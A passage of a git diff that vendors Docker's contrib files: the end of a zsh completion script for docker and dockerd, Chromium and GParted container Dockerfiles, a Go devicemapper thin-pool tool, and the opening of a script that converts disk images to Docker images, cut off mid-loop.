+        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
+        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
+        begin[${header[$i,$((j-1))]}]=$i
+        end[${header[$i,$((j-1))]}]=$k
+    done
+    end[${header[$i,$((j-1))]}]=-1
+    lines=(${lines[2,-1]})
+
+    # Names
+    local line s
+    for line in $lines; do
+        s="${line[${begin[VOLUME NAME]},${end[VOLUME NAME]}]%% ##}"
+        s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}"
+        volumes=($volumes $s)
+    done
+
+    _describe -t volumes-list "volumes" volumes && ret=0
+    return ret
+}
+
+__docker_volume_commands() {
+    local -a _docker_volume_subcommands
+    _docker_volume_subcommands=(
+        "create:Create a volume"
+        "inspect:Display detailed information on one or more volumes"
+        "ls:List volumes"
+        "prune:Remove all unused volumes"
+        "rm:Remove one or more volumes"
+    )
+    _describe -t docker-volume-commands "docker volume command" _docker_volume_subcommands
+}
+
+__docker_volume_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (create)
+            _arguments $(__docker_arguments) -A '-*' \
+                $opts_help \
+                "($help -d --driver)"{-d=,--driver=}"[Volume driver name]:Driver name:(local)" \
+                "($help)*--label=[Set metadata for a volume]:label=value: " \
+                "($help)*"{-o=,--opt=}"[Driver specific options]:Driver option: " \
+                "($help -)1:Volume name: " && ret=0
+            ;;
+        (inspect)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
+                "($help -)1:volume:__docker_complete_volumes" && ret=0
+            ;;
+        (ls)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
+                "($help)--format=[Pretty-print volumes using a Go template]:template: " \
+                "($help -q --quiet)"{-q,--quiet}"[Only display volume names]" && ret=0
+            case $state in
+                (filter-options)
+                    __docker_volume_complete_ls_filters && ret=0
+                    ;;
+            esac
+            ;;
+        (prune)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
+            ;;
+        (rm)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --force)"{-f,--force}"[Force the removal of one or more volumes]" \
+                "($help -):volume:__docker_complete_volumes" && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO volume
+
+__docker_caching_policy() {
+  oldp=( "$1"(Nmh+1) )     # 1 hour
+  (( $#oldp ))
+}
+
+__docker_commands() {
+    local cache_policy
+
+    zstyle -s ":completion:${curcontext}:" cache-policy cache_policy
+    if [[ -z "$cache_policy" ]]; then
+        zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy
+    fi
+
+    if ( [[ ${+_docker_subcommands} -eq 0 ]] || _cache_invalid docker_subcommands) \
+        && ! _retrieve_cache docker_subcommands;
+    then
+        local -a lines
+        lines=(${(f)"$(_call_program commands docker 2>&1)"})
+        _docker_subcommands=(${${${(M)${lines[$((${lines[(i)*Commands:]} + 1)),-1]}:# *}## #}/ ##/:})
+        _docker_subcommands=($_docker_subcommands 'daemon:Enable daemon mode' 'help:Show help for a command')
+        (( $#_docker_subcommands > 2 )) && _store_cache docker_subcommands _docker_subcommands
+    fi
+    _describe -t docker-commands "docker command" _docker_subcommands
+}
+
+__docker_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (attach|commit|cp|create|diff|exec|export|kill|logs|pause|unpause|port|rename|restart|rm|run|start|stats|stop|top|update|wait)
+            __docker_container_subcommand && ret=0
+            ;;
+        (build|history|import|load|pull|push|save|tag)
+            __docker_image_subcommand && ret=0
+            ;;
+        (container)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_container_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_container_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (daemon)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*--add-runtime=[Register an additional OCI compatible runtime]:runtime:__docker_complete_runtimes" \
+                "($help)--api-cors-header=[CORS headers in the Engine API]:CORS headers: " \
+                "($help)*--authorization-plugin=[Authorization plugins to load]" \
+                "($help -b --bridge)"{-b=,--bridge=}"[Attach containers to a network bridge]:bridge:_net_interfaces" \
+                "($help)--bip=[Network bridge IP]:IP address: " \
+                "($help)--cgroup-parent=[Parent cgroup for all containers]:cgroup: " \
+                "($help)--cluster-advertise=[Address or interface name to advertise]:Instance to advertise (host\:port): " \
+                "($help)--cluster-store=[URL of the distributed storage backend]:Cluster Store:->cluster-store" \
+                "($help)*--cluster-store-opt=[Cluster store options]:Cluster options:->cluster-store-options" \
+                "($help)--config-file=[Path to daemon configuration file]:Config File:_files" \
+                "($help)--containerd=[Path to containerd socket]:socket:_files -g \"*.sock\"" \
+                "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \
+                "($help)--default-gateway[Container default gateway IPv4 address]:IPv4 address: " \
+                "($help)--default-gateway-v6[Container default gateway IPv6 address]:IPv6 address: " \
+                "($help)*--default-ulimit=[Default ulimits for containers]:ulimit: " \
+                "($help)--disable-legacy-registry[Disable contacting legacy registries]" \
+                "($help)*--dns=[DNS server to use]:DNS: " \
+                "($help)*--dns-opt=[DNS options to use]:DNS option: " \
+                "($help)*--dns-search=[DNS search domains to use]:DNS search: " \
+                "($help)*--exec-opt=[Runtime execution options]:runtime execution options: " \
+                "($help)--exec-root=[Root directory for execution state files]:path:_directories" \
+                "($help)--experimental[Enable experimental features]" \
+                "($help)--fixed-cidr=[IPv4 subnet for fixed IPs]:IPv4 subnet: " \
+                "($help)--fixed-cidr-v6=[IPv6 subnet for fixed IPs]:IPv6 subnet: " \
+                "($help -G --group)"{-G=,--group=}"[Group for the unix socket]:group:_groups" \
+                "($help -g --graph)"{-g=,--graph=}"[Root of the Docker runtime]:path:_directories" \
+                "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \
+                "($help)--icc[Enable inter-container communication]" \
+                "($help)--init[Run an init inside containers to forward signals and reap processes]" \
+                "($help)--init-path=[Path to the docker-init binary]:docker-init binary:_files" \
+                "($help)*--insecure-registry=[Enable insecure registry communication]:registry: " \
+                "($help)--ip=[Default IP when binding container ports]" \
+                "($help)--ip-forward[Enable net.ipv4.ip_forward]" \
+                "($help)--ip-masq[Enable IP masquerading]" \
+                "($help)--iptables[Enable addition of iptables rules]" \
+                "($help)--ipv6[Enable IPv6 networking]" \
+                "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \
+                "($help)*--label=[Key=value labels]:label: " \
+                "($help)--live-restore[Enable live restore of docker when containers are still running]" \
+                "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" \
+                "($help)*--log-opt=[Default log driver options for containers]:log driver options:__docker_complete_log_options" \
+                "($help)--max-concurrent-downloads[Set the max concurrent downloads for each pull]" \
+                "($help)--max-concurrent-uploads[Set the max concurrent uploads for each push]" \
+                "($help)--mtu=[Network MTU]:mtu:(0 576 1420 1500 9000)" \
+                "($help)--oom-score-adjust=[Set the oom_score_adj for the daemon]:oom-score:(-500)" \
+                "($help -p --pidfile)"{-p=,--pidfile=}"[Path to use for daemon PID file]:PID file:_files" \
+                "($help)--raw-logs[Full timestamps without ANSI coloring]" \
+                "($help)*--registry-mirror=[Preferred Docker registry mirror]:registry mirror: " \
+                "($help)--seccomp-profile=[Path to seccomp profile]:path:_files -g \"*.json\"" \
+                "($help -s --storage-driver)"{-s=,--storage-driver=}"[Storage driver to use]:driver:(aufs btrfs devicemapper overlay overlay2 vfs zfs)" \
+                "($help)--selinux-enabled[Enable selinux support]" \
+                "($help)--shutdown-timeout=[Set the shutdown timeout value in seconds]:time: " \
+                "($help)*--storage-opt=[Storage driver options]:storage driver options: " \
+                "($help)--tls[Use TLS]" \
+                "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g \"*.(pem|crt)\"" \
+                "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g \"*.(pem|crt)\"" \
+                "($help)--tlskey=[Path to TLS key file]:Key file:_files -g \"*.(pem|key)\"" \
+                "($help)--tlsverify[Use TLS and verify the remote]" \
+                "($help)--userns-remap=[User/Group setting for user namespaces]:user\:group:->users-groups" \
+                "($help)--userland-proxy[Use userland proxy for loopback traffic]" \
+                "($help)--userland-proxy-path=[Path to the userland proxy binary]:binary:_files" && ret=0
+
+            case $state in
+                (cluster-store)
+                    if compset -P '*://'; then
+                        _message 'host:port' && ret=0
+                    else
+                        store=('consul' 'etcd' 'zk')
+                        _describe -t cluster-store "Cluster Store" store -qS "://" && ret=0
+                    fi
+                    ;;
+                (cluster-store-options)
+                    if compset -P '*='; then
+                        _files && ret=0
+                    else
+                        opts=('discovery.heartbeat' 'discovery.ttl' 'kv.cacertfile' 'kv.certfile' 'kv.keyfile' 'kv.path')
+                        _describe -t cluster-store-opts "Cluster Store Options" opts -qS "=" && ret=0
+                    fi
+                    ;;
+                (users-groups)
+                    if compset -P '*:'; then
+                        _groups && ret=0
+                    else
+                        _describe -t userns-default "default Docker user management" '(default)' && ret=0
+                        _users && ret=0
+                    fi
+                    ;;
+            esac
+            ;;
+        (events|info)
+            __docker_system_subcommand && ret=0
+            ;;
+        (image)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_image_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_image_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (images)
+            words[1]='ls'
+            __docker_image_subcommand && ret=0
+            ;;
+        (inspect)
+            local state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
+                "($help -s --size)"{-s,--size}"[Display total file sizes if the type is container]" \
+                "($help)--type=[Return JSON for specified type]:type:(container image network node plugin service volume)" \
+                "($help -)*: :->values" && ret=0
+
+            case $state in
+                (values)
+                    if [[ ${words[(r)--type=container]} == --type=container ]]; then
+                        __docker_complete_containers && ret=0
+                    elif [[ ${words[(r)--type=image]} == --type=image ]]; then
+                        __docker_complete_images && ret=0
+                    elif [[ ${words[(r)--type=network]} == --type=network ]]; then
+                        __docker_complete_networks && ret=0
+                    elif [[ ${words[(r)--type=node]} == --type=node ]]; then
+                        __docker_complete_nodes && ret=0
+                    elif [[ ${words[(r)--type=plugin]} == --type=plugin ]]; then
+                        __docker_complete_plugins && ret=0
+                    elif [[ ${words[(r)--type=service]} == --type=service ]]; then
+                        __docker_complete_services && ret=0
+                    elif [[ ${words[(r)--type=volume]} == --type=volume ]]; then
+                        __docker_complete_volumes && ret=0
+                    else
+                        __docker_complete_containers
+                        __docker_complete_images
+                        __docker_complete_networks
+                        __docker_complete_nodes
+                        __docker_complete_plugins
+                        __docker_complete_services
+                        __docker_complete_volumes && ret=0
+                    fi
+                    ;;
+            esac
+            ;;
+        (login)
+            _arguments $(__docker_arguments) -A '-*' \
+                $opts_help \
+                "($help -p --password)"{-p=,--password=}"[Password]:password: " \
+                "($help -u --user)"{-u=,--user=}"[Username]:username: " \
+                "($help -)1:server: " && ret=0
+            ;;
+        (logout)
+            _arguments $(__docker_arguments) -A '-*' \
+                $opts_help \
+                "($help -)1:server: " && ret=0
+            ;;
+        (network)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_network_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_network_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (node)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_node_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_node_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (plugin)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_plugin_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_plugin_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (ps)
+            words[1]='ls'
+            __docker_container_subcommand && ret=0
+            ;;
+        (rmi)
+            words[1]='rm'
+            __docker_image_subcommand && ret=0
+            ;;
+        (search)
+            _arguments $(__docker_arguments) -A '-*' \
+                $opts_help \
+                "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \
+                "($help)--limit=[Maximum returned search results]:limit:(1 5 10 25 50)" \
+                "($help)--no-trunc[Do not truncate output]" \
+                "($help -):term: " && ret=0
+
+            case $state in
+                (filter-options)
+                    __docker_complete_search_filters && ret=0
+                    ;;
+            esac
+            ;;
+        (secret)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_secret_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_secret_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (service)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_service_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_service_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (stack)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_stack_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_stack_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (swarm)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_swarm_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_swarm_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (system)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_system_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_system_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (version)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0
+            ;;
+        (volume)
+            local curcontext="$curcontext" state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -): :->command" \
+                "($help -)*:: :->option-or-argument" && ret=0
+
+            case $state in
+                (command)
+                    __docker_volume_commands && ret=0
+                    ;;
+                (option-or-argument)
+                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
+                    __docker_volume_subcommand && ret=0
+                    ;;
+            esac
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+_docker() {
+    # Support for subservices, which allows for `compdef _docker docker-shell=_docker_containers`.
+    # Based on /usr/share/zsh/functions/Completion/Unix/_git without support for `ret`.
+    if [[ $service != docker ]]; then
+        _call_function - _$service
+        return
+    fi
+
+    local curcontext="$curcontext" state line help="-h --help"
+    integer ret=1
+    typeset -A opt_args
+
+    _arguments $(__docker_arguments) -C \
+        "(: -)"{-h,--help}"[Print usage]" \
+        "($help)--config[Location of client config files]:path:_directories" \
+        "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \
+        "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \
+        "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \
+        "($help)--tls[Use TLS]" \
+        "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g "*.(pem|crt)"" \
+        "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g "*.(pem|crt)"" \
+        "($help)--tlskey=[Path to TLS key file]:Key file:_files -g "*.(pem|key)"" \
+        "($help)--tlsverify[Use TLS and verify the remote]" \
+        "($help)--userland-proxy[Use userland proxy for loopback traffic]" \
+        "($help -v --version)"{-v,--version}"[Print version information and quit]" \
+        "($help -): :->command" \
+        "($help -)*:: :->option-or-argument" && ret=0
+
+    local host=${opt_args[-H]}${opt_args[--host]}
+    local config=${opt_args[--config]}
+    local docker_options="${host:+--host $host} ${config:+--config $config}"
+
+    case $state in
+        (command)
+            __docker_commands && ret=0
+            ;;
+        (option-or-argument)
+            curcontext=${curcontext%:*:*}:docker-$words[1]:
+            __docker_subcommand && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+_dockerd() {
+    integer ret=1
+    words[1]='daemon'
+    __docker_subcommand && ret=0
+    return ret
+}
+
+_docker "$@"
+
+# Local Variables:
+# mode: Shell-Script
+# sh-indentation: 4
+# indent-tabs-mode: nil
+# sh-basic-offset: 4
+# End:
+# vim: ft=zsh sw=4 ts=4 et
diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/README.md b/vendor/github.com/docker/docker/contrib/desktop-integration/README.md
new file mode 100644
index 0000000000..85a01b9ee9
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/desktop-integration/README.md
@@ -0,0 +1,11 @@
+Desktop Integration
+===================
+
+The ./contrib/desktop-integration contains examples of typical dockerized
+desktop applications.
+
+Examples
+========
+
+* Chromium: ./chromium/Dockerfile shows a way to dockerize a common application
+* Gparted: ./gparted/Dockerfile shows a way to dockerize a common application w devices
diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile
new file mode 100644
index 0000000000..5cacd1f999
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile
@@ -0,0 +1,36 @@
+# VERSION:        0.1
+# DESCRIPTION:    Create chromium container with its dependencies
+# AUTHOR:         Jessica Frazelle <jess@docker.com>
+# COMMENTS:
+#   This file describes how to build a Chromium container with all
+#   dependencies installed. It uses native X11 unix socket.
+#   Tested on Debian Jessie
+# USAGE:
+#   # Download Chromium Dockerfile
+#   wget http://raw.githubusercontent.com/docker/docker/master/contrib/desktop-integration/chromium/Dockerfile
+#
+#   # Build chromium image
+#   docker build -t chromium .
+#
+#   # Run stateful data-on-host chromium. For ephemeral, remove -v /data/chromium:/data
+#   docker run -v /data/chromium:/data -v /tmp/.X11-unix:/tmp/.X11-unix \
+#   -e DISPLAY=unix$DISPLAY chromium
+
+#   # To run stateful dockerized data containers
+#   docker run --volumes-from chromium-data -v /tmp/.X11-unix:/tmp/.X11-unix \
+#   -e DISPLAY=unix$DISPLAY chromium
+
+# Base docker image
+FROM debian:jessie
+MAINTAINER Jessica Frazelle <jess@docker.com>
+
+# Install Chromium
+RUN apt-get update && apt-get install -y \
+    chromium \
+    chromium-l10n \
+    libcanberra-gtk-module \
+    libexif-dev \
+    --no-install-recommends
+
+# Autorun chromium
+CMD ["/usr/bin/chromium", "--no-sandbox", "--user-data-dir=/data"]
diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile
new file mode 100644
index 0000000000..3ddb23208d
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile
@@ -0,0 +1,31 @@
+# VERSION:        0.1
+# DESCRIPTION:    Create gparted container with its dependencies
+# AUTHOR:         Jessica Frazelle <jess@docker.com>
+# COMMENTS:
+#   This file describes how to build a gparted container with all
+#   dependencies installed. It uses native X11 unix socket.
+#   Tested on Debian Jessie
+# USAGE:
+#   # Download gparted Dockerfile
+#   wget http://raw.githubusercontent.com/docker/docker/master/contrib/desktop-integration/gparted/Dockerfile
+#
+#   # Build gparted image
+#   docker build -t gparted .
+#
+#   docker run -v /tmp/.X11-unix:/tmp/.X11-unix \
+#     --device=/dev/sda:/dev/sda \
+#     -e DISPLAY=unix$DISPLAY gparted
+#
+
+# Base docker image
+FROM debian:jessie
+MAINTAINER Jessica Frazelle <jess@docker.com>
+
+# Install Gparted and its dependencies
+RUN apt-get update && apt-get install -y \
+    gparted \
+    libcanberra-gtk-module \
+    --no-install-recommends
+
+# Autorun gparted
+CMD ["/usr/sbin/gparted"]
diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/README.md b/vendor/github.com/docker/docker/contrib/docker-device-tool/README.md
new file mode 100644
index 0000000000..6c54d5995f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/README.md
@@ -0,0 +1,14 @@
+Docker device tool for devicemapper storage driver backend
+===================
+
+The ./contrib/docker-device-tool contains a tool to manipulate devicemapper thin-pool.
+
+Compile
+========
+
+    $ make shell
+    ## inside build container
+    $ go build contrib/docker-device-tool/device_tool.go
+
+    # if devicemapper version is old and compilation fails, compile with `libdm_no_deferred_remove` tag
+    $ go build -tags libdm_no_deferred_remove contrib/docker-device-tool/device_tool.go
diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go
new file mode 100644
index 0000000000..906d064df6
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go
@@ -0,0 +1,176 @@
+// +build !windows,!solaris
+
+package main
+
+import (
+	"flag"
+	"fmt"
+	"os"
+	"path"
+	"sort"
+	"strconv"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/graphdriver/devmapper"
+	"github.com/docker/docker/pkg/devicemapper"
+)
+
+func usage() {
+	fmt.Fprintf(os.Stderr, "Usage: %s <flags>  [status] | [list] | [device id]  | [resize new-pool-size] | [snap new-id base-id] | [remove id] | [mount id mountpoint]\n", os.Args[0])
+	flag.PrintDefaults()
+	os.Exit(1)
+}
+
+func byteSizeFromString(arg string) (int64, error) {
+	digits := ""
+	rest := ""
+	last := strings.LastIndexAny(arg, "0123456789")
+	if last >= 0 {
+		digits = arg[:last+1]
+		rest = arg[last+1:]
+	}
+
+	val, err := strconv.ParseInt(digits, 10, 64)
+	if err != nil {
+		return val, err
+	}
+
+	rest = strings.ToLower(strings.TrimSpace(rest))
+
+	var multiplier int64 = 1
+	switch rest {
+	case "":
+		multiplier = 1
+	case "k", "kb":
+		multiplier = 1024
+	case "m", "mb":
+		multiplier = 1024 * 1024
+	case "g", "gb":
+		multiplier = 1024 * 1024 * 1024
+	case "t", "tb":
+		multiplier = 1024 * 1024 * 1024 * 1024
+	default:
+		return 0, fmt.Errorf("Unknown size unit: %s", rest)
+	}
+
+	return val * multiplier, nil
+}
+
+func main() {
+	root := flag.String("r", "/var/lib/docker", "Docker root dir")
+	flDebug := flag.Bool("D", false, "Debug mode")
+
+	flag.Parse()
+
+	if *flDebug {
+		os.Setenv("DEBUG", "1")
+		logrus.SetLevel(logrus.DebugLevel)
+	}
+
+	if flag.NArg() < 1 {
+		usage()
+	}
+
+	args := flag.Args()
+
+	home := path.Join(*root, "devicemapper")
+	devices, err := devmapper.NewDeviceSet(home, false, nil, nil, nil)
+	if err != nil {
+		fmt.Println("Can't initialize device mapper: ", err)
+		os.Exit(1)
+	}
+
+	switch args[0] {
+	case "status":
+		status := devices.Status()
+		fmt.Printf("Pool name: %s\n", status.PoolName)
+		fmt.Printf("Data Loopback file: %s\n", status.DataLoopback)
+		fmt.Printf("Metadata Loopback file: %s\n", status.MetadataLoopback)
+		fmt.Printf("Sector size: %d\n", status.SectorSize)
+		fmt.Printf("Data use: %d of %d (%.1f %%)\n", status.Data.Used, status.Data.Total, 100.0*float64(status.Data.Used)/float64(status.Data.Total))
+		fmt.Printf("Metadata use: %d of %d (%.1f %%)\n", status.Metadata.Used, status.Metadata.Total, 100.0*float64(status.Metadata.Used)/float64(status.Metadata.Total))
+		break
+	case "list":
+		ids := devices.List()
+		sort.Strings(ids)
+		for _, id := range ids {
+			fmt.Println(id)
+		}
+		break
+	case "device":
+		if flag.NArg() < 2 {
+			usage()
+		}
+		status, err := devices.GetDeviceStatus(args[1])
+		if err != nil {
+			fmt.Println("Can't get device info: ", err)
+			os.Exit(1)
+		}
+		fmt.Printf("Id: %d\n", status.DeviceID)
+		fmt.Printf("Size: %d\n", status.Size)
+		fmt.Printf("Transaction Id: %d\n", status.TransactionID)
+		fmt.Printf("Size in Sectors: %d\n", status.SizeInSectors)
+		fmt.Printf("Mapped Sectors: %d\n", status.MappedSectors)
+		fmt.Printf("Highest Mapped Sector: %d\n", status.HighestMappedSector)
+		break
+	case "resize":
+		if flag.NArg() < 2 {
+			usage()
+		}
+
+		size, err := byteSizeFromString(args[1])
+		if err != nil {
+			fmt.Println("Invalid size: ", err)
+			os.Exit(1)
+		}
+
+		err = devices.ResizePool(size)
+		if err != nil {
+			fmt.Println("Error resizing pool: ", err)
+			os.Exit(1)
+		}
+
+		break
+	case "snap":
+		if flag.NArg() < 3 {
+			usage()
+		}
+
+		err := devices.AddDevice(args[1], args[2], nil)
+		if err != nil {
+			fmt.Println("Can't create snap device: ", err)
+			os.Exit(1)
+		}
+		break
+	case "remove":
+		if flag.NArg() < 2 {
+			usage()
+		}
+
+		err := devicemapper.RemoveDevice(args[1])
+		if err != nil {
+			fmt.Println("Can't remove device: ", err)
+			os.Exit(1)
+		}
+		break
+	case "mount":
+		if flag.NArg() < 3 {
+			usage()
+		}
+
+		err := devices.MountDevice(args[1], args[2], "")
+		if err != nil {
+			fmt.Println("Can't create snap device: ", err)
+			os.Exit(1)
+		}
+		break
+	default:
+		fmt.Printf("Unknown command %s\n", args[0])
+		usage()
+
+		os.Exit(1)
+	}
+
+	return
+}
diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go
new file mode 100644
index 0000000000..da29a2cadf
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go
@@ -0,0 +1,4 @@
+package main
+
+func main() {
+}
diff --git a/vendor/github.com/docker/docker/contrib/dockerize-disk.sh b/vendor/github.com/docker/docker/contrib/dockerize-disk.sh
new file mode 100755
index 0000000000..444e243abe
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/dockerize-disk.sh
@@ -0,0 +1,118 @@
+#!/usr/bin/env bash
+set -e
+
+if ! command -v qemu-nbd &> /dev/null; then
+  echo >&2 'error: "qemu-nbd" not found!'
+  exit 1
+fi
+
+usage() {
+  echo "Convert disk image to docker image"
+  echo ""
+  echo "usage: $0 image-name disk-image-file [ base-image ]"
+  echo "   ie: $0 cirros:0.3.3 cirros-0.3.3-x86_64-disk.img"
+  echo "       $0 ubuntu:cloud ubuntu-14.04-server-cloudimg-amd64-disk1.img ubuntu:14.04"
+}
+
+if [ "$#" -lt 2 ]; then
+  usage
+  exit 1
+fi
+
+CURDIR=$(pwd)
+
+image_name="${1%:*}"
+image_tag="${1#*:}"
+if [ "$image_tag" == "$1" ]; then
+  image_tag="latest"
+fi
+
+disk_image_file="$2"
+docker_base_image="$3"
+
+block_device=/dev/nbd0
+
+builddir=$(mktemp -d)
+
+cleanup() {
+  umount "$builddir/disk_image" || true
+  umount "$builddir/workdir" || true
+  qemu-nbd -d $block_device &> /dev/null || true
+  rm -rf $builddir
+}
+trap cleanup EXIT
+
+# Mount disk image
+modprobe nbd max_part=63
+qemu-nbd -rc ${block_device} -P 1 "$disk_image_file"
+mkdir "$builddir/disk_image"
+mount -o ro ${block_device} "$builddir/disk_image"
+
+mkdir "$builddir/workdir"
+mkdir "$builddir/diff"
+
+base_image_mounts=""
+
+# Unpack base image
+if [ -n "$docker_base_image" ]; then
+  mkdir -p "$builddir/base"
+  docker pull "$docker_base_image"
+  docker save "$docker_base_image" | tar -xC "$builddir/base"
+
+  image_id=$(docker inspect -f "{{.Id}}" "$docker_base_image")
+  while [ -n "$image_id" ]; do
+    mkdir -p "$builddir/base/$image_id/layer"
+    tar -xf "$builddir/base/$image_id/layer.tar" -C "$builddir/base/$image_id/layer"
+
